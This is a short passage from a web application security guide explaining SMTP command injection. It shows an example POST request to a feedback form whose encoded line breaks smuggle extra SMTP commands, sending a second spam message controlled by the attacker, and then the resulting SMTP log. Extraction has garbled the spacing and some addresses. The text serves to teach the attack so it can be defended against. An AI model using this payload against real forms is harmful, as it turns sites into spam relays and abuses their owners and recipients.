Web application security - the fast guide 1.1 | Page 147

Chapter 7 - Attack execution (3) P a g e | 147 The main difference with previous header manipulation approach is the fact that you can pass SMTP commands which will give the attacker the opportunity to send another MAIL From command getting the full control over totally new message. As example let’s say that the attacker injects the following input benefitting of course from the improper input validation. POST feedback.php HTTP/1.1 Host: vulnerableApp.com Content-Length: 266 [email protected]&Subject=Site+feedback%0d%0a any message%0d%0a%2e%0d %0aMAIL+FROM:+mail@attacker- viagra.com%0d%0aRCPT+TO:[email protected]%0d%0aDATA%0d%0a From:+ [email protected]%0d%0aTo:+ [email protected] .com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Me ssage=spam message contents The resulting SMTP communication log will be MAIL FROM: [email protected] RCPT TO: feedback@ vulnerableApp.com DATA From: [email protected] To: [email protected] Subject: Site+feedback any message . MAIL FROM: [email protected] RCPT TO: [email protected] DATA From: [email protected] To: [email protected] Subject: Cheap V1AGR4 Blah . spam message contents . It is quite clear that two messages will be sent on is a legitimate one and the second is totally controlled by the attacker.